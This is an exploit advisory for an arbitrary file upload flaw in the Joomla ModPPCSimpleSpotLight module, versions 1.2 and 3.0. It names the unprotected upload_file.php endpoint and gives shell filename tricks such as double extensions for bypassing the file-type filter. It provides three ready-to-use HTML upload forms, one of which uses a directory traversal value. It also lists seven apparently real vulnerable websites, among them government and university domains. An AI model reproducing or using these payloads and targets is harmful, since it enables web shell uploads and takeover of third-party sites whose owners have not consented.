Joomla ModPPCSimpleSpotLight 1.2/3.0 CSRF Backdoor Access

1. ###############################################################################
2.  
3. # Exploit Title : Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Backdoor Access Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/03/2019
7. # Vendor Homepage : pixelpointcreative.com
8. # Software Download Link : pixelpointcreative.com/joomla/downloads/category/40-simple-spotlight
9. # Software Information Link : extensions.joomla.org/extension/simple-spotlight/
10. bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,1547/Itemid,95/
11. # Software Version : 1.2 and 3.0
12. # Software Price Type : Free/Paid Download
13. # Solution : Upgrade and Update to 3.1 or higher version
14. # Tested On : Windows and Linux
15. # Category : WebApps
16. # Exploit Risk : Medium
17. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
21. # Reference Link : cxsecurity.com/issue/WLB-2019030020
22.  
23. ###############################################################################
24.  
25. # Description about Software :
26. ***************************
27. Simple spotlight is a jQuery image rotator with navigation for Joomla.
28.  
29. ###############################################################################
30.  
31. # Impact :
32. ***********
33. Joomla ModPPCSimpleSpotLight 1.2/3.0 versions is prone to an arbitrary file upload vulnerability.
34.  
35. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can
36.  
37. result in arbitrary code execution within the context of the vulnerable application.
38.  
39. Weaknesses in this category are related to the management of permissions, privileges,
40.  
41. and other security features that are used to perform access control.
42.  
43. ###############################################################################
44.  
45. # Arbitrary File Upload / Unauthorized File Insertation / Shell Upload Backdoor Access Exploit :
46. **********************************************************************************
47. /modules/mod_ppc_simple_spotlight/elements/upload_file.php
48.  
49. # Directory File Path :
50. *********************
51. /modules/mod_ppc_simple_spotlight/img/.......
52.  
53. # Note : It is possible to upload shell files like this =>
54.  
55. Sh3LL.php.gif - Sh3LL.php;.gif - Sh3LL.asp;.jpeg
56.  
57. Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv
58.  
59. .jpg .jpeg .gif .png
60.  
61. It says : File Uploaded Successfully!
62.  
63. ###############################################################################
64.  
65. Cross Site Request Forgery Exploits :
66. **********************************
67.  
68. CSRF Exploiter PoC 1 =>
69. ************************
70. <form action="example.com/[PATH]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post" enctype="multipart/form-data" >
71. <input name="Images" type="file" class="submit" size="80">
72. <input type="submit" value="Upload !">
73. </form>
74.  
75. ###############################################################################
76.  
77. CSRF Exploiter PoC 2 =>
78. *************************
79. <form enctype="multipart/form-data"
80. action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
81. Your File: <input name="upload_file" type="file" /><br />
82. <input type="hidden" name="dir_icons" value="../../../../">
83. <input type="submit" value="upload" />
84. </form>
85.  
86. ###############################################################################
87.  
88. CSRF Exploiter PoC 3 =>
89. *************************
90. </script>
91. <form name="newad" method="post" enctype="multipart/form-data" action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
92. <table>
93. <tr>
94. <td>
95. <input type="file" name="image">
96. </td>
97. </tr>
98. <tr>
99. <td>
100. <input name="Submit" type="submit" value="Upload image">
101. <input type="button" value="Close" onclick="javascript: refreshParent()">
102. </td>
103. </tr>
104. </table>
105. </form>
106.  
107. ###############################################################################
108.  
109. # Example Vulnerable Sites :
110. *************************
111. [+] velb.com.br/modules/mod_ppc_simple_spotlight/elements/upload_file.php
112.  
113. [+] chambre-hotes-lyon.fr/modules/mod_ppc_simple_spotlight/elements/upload_file.php
114.  
115. [+] doc.ncnu.edu.tw/rnd/modules/mod_ppc_simple_spotlight/elements/upload_file.php
116.  
117. [+] hjasin.moh.gov.my/modules/mod_ppc_simple_spotlight/elements/upload_file.php
118.  
119. [+] lce.ac.ls/modules/mod_ppc_simple_spotlight/elements/upload_file.php
120.  
121. [+] esg.edu.ar/modules/mod_ppc_simple_spotlight/elements/upload_file.php
122.  
123. [+] launion.go.cr/modules/mod_ppc_simple_spotlight/elements/upload_file.php
124.  
125. ####################################################################
126.  
127. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
128.  
129. ####################################################################